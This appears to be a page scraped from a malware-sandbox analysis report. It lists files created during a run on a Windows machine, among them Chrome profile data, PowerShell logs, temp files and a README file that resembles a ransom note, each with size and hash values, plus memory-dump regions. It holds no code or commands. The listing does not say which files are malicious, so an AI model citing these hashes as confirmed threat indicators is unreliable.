4f12ef51365011f94347cb61f5c1a615acf9cd7b72ae35d51484d264f6fd0a2f7bf496db80f453b079780c42b39db5286f19ec4981ad42d583643187c97aa6f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
b686a2764ff5aa6b4f4fb697db4ad20c

SHA1
867264fd252074b49160fc0d415ffe23bd45f044

SHA256
1c24fdaac1a2f9408858fcd5ee3015e654c18bd2bf867a0014d6785503d4ba01

SHA512
5e38e9d1102665d96b2a8143b9b7a37cc8ea89289d8e1cbc73c642599586c7014e4e9d3ff41556ac0b337f41a4d2c48ce53e350db62886d4f9f6aadc41766377

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Search Logos\dark_logo
Filesize
50KB

MD5
975f43f48556969987a9a09408c0819a

SHA1
067e563d0e63a7a94736c5d8a970148c5abe68ef

SHA256
5bc49c5c2e1fe42a2ad5b25cb8bf2fdd89d3c78d37db2862bf3a6cc0150d406d

SHA512
b061859c25c20ae69581d18cca03c5f0586eac93bc9bf5f4ef6c23d038d7a802add4210d7733b37fc649465beb7cabbb5c7c15685cef4126f4eee490d563a8b3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Search Logos\logo
Filesize
49KB

MD5
705a2c2c02ef0a671e1bbb49ab9bd67f

SHA1
520af30faafe51d3e6903b444819bbcd041cd1b1

SHA256
659a38a50f9722e002e7bc36f3fb3bdcf795714624cb220dfdf28935397eb462

SHA512
9569a55024330223aec2584cdc0320684d0d7453d5a2e7d1fe620b63f5963161f3605bee0247ff802206e50c974edf14c88796d02b7720836a2d1fb69cf20bf8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Search Logos\metadata
Filesize
1KB

MD5
37919c876a767da1de2af1bc5bc4878a

SHA1
8675c11e029f62714108c3a3d6da264ef17e0fb3

SHA256
c64ecb8af1f0631f4e95664cf86fa70d49aa9fc4c6eb094069c2338a424eb2a6

SHA512
5cd40b6e463d8bc31a0444dcfe9187aa123e79b2b6a836d61143e51818e0cc4310089eacf96f8561ff68b4113bd7a4755deec7091cad2a32a1d03f01b6ef66e7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Filesize
15KB

MD5
a27330eea45dd2c274e2030346a89c94

SHA1
3dbc5faf20e2d6ff0eadc701d4872bc1c8f378c6

SHA256
70647952b638685ce4d1d3540bb72982990ee418169843bb99a8e726c4d2b245

SHA512
09f6d4b3d95700fec30e7b208037ddee3e5d3bab4de6d80b1ffbf3f77eb5ad56c0f2139b3cfe267b0527c4274c98b97ab29b77aca03353be0ac11513f697e3a9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log
Filesize
194B

MD5
d7d9437445aa960dcea52ffe772822dc

SHA1
c2bbf4ac0732d905d998c4f645fd60f95a675d02

SHA256
4ff49903bec1197017a35995d5c5fc703caf9d496467345d783f754b723d21c1

SHA512
335eb1ba85670550ed1e1e4e14ea4b5d14f8306125bf147a42de4def5e5f75f14c422b014414030cf30378c04f748ac875cf056adda196511a0b057b3598fe9a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG
Filesize
317B

MD5
d17b352071d210c16bd6218f820bc893

SHA1
8c9d316175dd4e2aa0d6de448064f1da51c49f9d

SHA256
d21ed51b08f304fafd23deb34975f7b9c4342ac5ca88c339fcf3a27bf508b690

SHA512
0018c455fbe0eb1e97d6183d2c12fe50c43eae776dbb4fa867551ee4225d31cc84d744ba750cf1fd6742d3954e26d7bd1c56408d09d3e86dd7e911920d860d6c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13333749732431964
Filesize
2KB

MD5
734007506acc80dd366321cacb8e69ad

SHA1
eddb3c4fe47a69be85a8aadd856b7eec70f48c24

SHA256
71fbf4d1f768228c03b7a8a1938e2fabe5ad11786a04ced800aa91912b011c5f

SHA512
e5a8cbde996ff9afb2c8708f5f56e6bbf7db24e4706bfad19144876cacb4c9a71197175833942780e7c17ea18cebc0945a3a0150ac41db986faf74f91d0ae1e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG
Filesize
345B

MD5
0db065fc51c4447c7f4eb5f5216dbd17

SHA1
6bc16ede4a2f9c550543c8a2c8b968291a0d2a53

SHA256
698198d1e9a2c8dacbe3c51b175c4193adfa1573d7446cf92b899ef8e93e82cc

SHA512
85fd2f326b057e959f12bd1e1f0c44a1f6f79a0acb4df129b2478b1685faa68eaa26c343222109decfef4049ccc76189bf658d0973234e4986e65194d3bb6158

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG
Filesize
324B

MD5
dc7aebd5fd91f6f1b86ef9c792c843b4

SHA1
2927a8af3fbc9f164d1a404a060abfd6b915be31

SHA256
4e3fd76c915842e2ab7b2509f3c98e042ce18abb7887990dc4a26a8c351cc21c

SHA512
1a01287cc5e0eecbafa4f9f6f2c422924c6f4e19f80e23663bc86d26e672bfe689c4a3f6e3b28de93a804fff22427c9fc8ef7c33150d940ecf69348860737c2e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log
Filesize
817B

MD5
297b9e37731445f9c773e946c02c411f

SHA1
c5ad3a66ed40e4e9324f9424edd36e3d1d396ce4

SHA256
945d90fe222554f81b3835a5c8035408f7a2590b53fd9fbc471aa104621ef9b2

SHA512
5df3fcb127103e03278c0e3ffa7f829408c34beb74bbf2b89535e0990aac3fe5b3624cf19b8063d04de56e1ffeaf59a0085545763e6ef6dfdffc2954509a5a7b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG
Filesize
317B

MD5
06d25d965c3b3038f50489416c12a7bf

SHA1
7aa51ad99009e285deac5ccc13da62a4262c4eee

SHA256
d1a923c319dbf95a541661f1e525c24bc04cb36a2458a7d0215db78510462d8d

SHA512
1f948af24cc2b8a8c17b980b2a21e1f1d596fa9e97b4537e9042fe734a5d361424bacfda3cecc18a27d2465c4f71c87211d5087862d0bc50a931365d879efebc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log
Filesize
855B

MD5
f9acbed1d6d7b372fb0848d1a35c5c30

SHA1
050a3c8b5dced2c20088d35b5107f449b351b167

SHA256
aabd5c54820ffd4a41ad2ecd2041b5652b5ea70757aca1abf471e1625ef38a91

SHA512
416b806bffeb4ec90d9c581fd7678b965b13f7d6b7db654a4fc4445a9ee566d2028fa580c45c5403f5af154307025ec6d96352a5c17d2df9e2a865c4ca686bdb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG
Filesize
335B

MD5
ed659fd9edc5e4db073e5532a40fe1c5

SHA1
f883efc2965798f6de75f335647fefd6feac78a9

SHA256
8fb6fc99bd1939d99851ccc1f508ab4d2241a33a58a998cdc9a0f187b04ead2e

SHA512
c4e592be8be08dc0906126fb361cf01afb22955be37e162394bcf80c02fcec5133a9fbe305022084491f9b2d209945343b9cabf84a7a65993c3046e501516bea

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0
Filesize
44KB

MD5
56a28499ba8a3638c74fc9abd9dad970

SHA1
2489bd503b45824c63991465fcda6129401954ea

SHA256
3322307b6926beba5ab71bc51afa28f3ef27802073d71dbb895463488b520e21

SHA512
afba86aa4faf18cd94fa2ad7925c8212e722fc4c3821c335544be7de3c078d45ab902c4362d2644d5de715414a3a4ab0d39fe9f1aaff8c0f853df5aa07584d2f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1
Filesize
264KB

MD5
23916ce11f65f7811d057e424ca33922

SHA1
2ea91c14db4c0afac540a86dd259474b5e10ae14

SHA256
39f509d7f817cc9666448d7046d9dda64a675014cdc683d29362777c892476bd

SHA512
cd66bee03d2a7cf5f4b9e13b80c34daa6e42748a7831ab00216bfd4986afc50fb337c5d98b26c78e94d047be6e4884714c8ecaf014b21a3e316e86930b5b5649

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_3
Filesize
4.0MB

MD5
130ac97d81116793fb1ef2cc8851487e

SHA1
aff96219053751cc66f89baf8ce1710985bc04ca

SHA256
ae944649088b1caf5e59a4f051416bf9e8e576dbd25969e1080a37e142e931e6

SHA512
f15ef3d011f307fc9d871ac2aa341d8fe59cb7500a8829687b01361ba991af17aedf80a36e91dea0230f1d8f9f130c93372444a5d5cdb252b246c23adba24c02

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version
Filesize
14B

MD5
9eae63c7a967fc314dd311d9f46a45b7

SHA1
caba9c2c93acfe0b9ceb9ab19b992b0fc19c71cf

SHA256
4288925b0cf871c7458c22c46936efb0e903802feb991a0e1803be94ca6c251d

SHA512
bed924bff236bf5b6ce1df1db82e86c935e5830a20d9d24697efd82ca331e30604db8d04b0d692ec8541ec6deb2225bcc7d805b79f2db5726642198ecf6348b8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
173KB

MD5
6435fae3e6841d8fa1c0e53994909eb3

SHA1
147501c9ee22a7dd24a8491b16e8bcb14a5ddf20

SHA256
76aac15d0b55a6a68aabcfd2c5fcbeb2b4a979405ec84c6a6c08a599fb8dd773

SHA512
9f8f32286f21676a2191a04da5a6bb5d46adb33dbe8c56c2b2b042e252c0c91064e4de4f7638c1b7d1c9abf54d8ee15d2c8919070436ad3ce2e2a0fbd12c9d4e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations
Filesize
86B

MD5
961e3604f228b0d10541ebf921500c86

SHA1
6e00570d9f78d9cfebe67d4da5efe546543949a7

SHA256
f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed

SHA512
535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
71444def27770d9071039d005d0323b7

SHA1
cef8654e95495786ac9347494f4417819373427e

SHA256
8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

SHA512
a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

Download Submit
C:\Users\Admin\AppData\Local\Temp\3cef5ebf-a0bd-4722-9913-47f868fde725.tmp
Filesize
94KB

MD5
15b24e4473b122b5bfd9eb227eb20b18

SHA1
8bd18f5326d1780351b9bf19b70c472c58fbb4ce

SHA256
8effc0b4281653b73638fb373e7e3f3c4764cabec6b1f2362fd9664231179ef0

SHA512
7af4a8b0c8513cb5dbba7471a44a115d30b286b596d3f23df09aa1667206faab0561c368217d0076583ccf17bb7a70324e069a41532793ae4b2d903543b749e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\96b74cfa-5e63-4c00-b540-5582fefa93ab.tmp
Filesize
203KB

MD5
3152c0bd0334e1356f6238bd54c25c6d

SHA1
1d76484ff9148b8078c8876b2a00e2a0c3bcd2b7

SHA256
42fabeb69c89a9d134f3032a42229a75a6284725898aae317100e495e99ccfa7

SHA512
2855bea6402133a8f1ff3741ec13c60bbc0263b5c4c1903c28131bf38b2180be889d81576c6b71334dbba840f9044f9cd60dd9eb3dbd17e848798ce3c031c5b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3y4crnfu.3dw.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\README.75ec1c69.TXT
Filesize
3KB

MD5
b58e2411168bbdbec635cf4001635db0

SHA1
c130cd9caaaa514a6b98c1168e10d44a989d191a

SHA256
652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a

SHA512
87e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a

Download Submit
memory/4144-142-0x000002B8AC520000-0x000002B8AC542000-memory.dmp

Filesize
136KB

Download
memory/4144-150-0x00007FFA9A1F0000-0x00007FFA9ACB1000-memory.dmp

Filesize
10.8MB

Download
memory/4144-152-0x000002B8C4CA0000-0x000002B8C4CB0000-memory.dmp

Filesize
64KB

Download
memory/4144-151-0x000002B8C4CA0000-0x000002B8C4CB0000-memory.dmp

Filesize
64KB

Download
memory/4144-153-0x000002B8C4CA0000-0x000002B8C4CB0000-memory.dmp

Filesize
64KB

Download
memory/4144-172-0x00007FFA9A1F0000-0x00007FFA9ACB1000-memory.dmp

Filesize
10.8MB

Download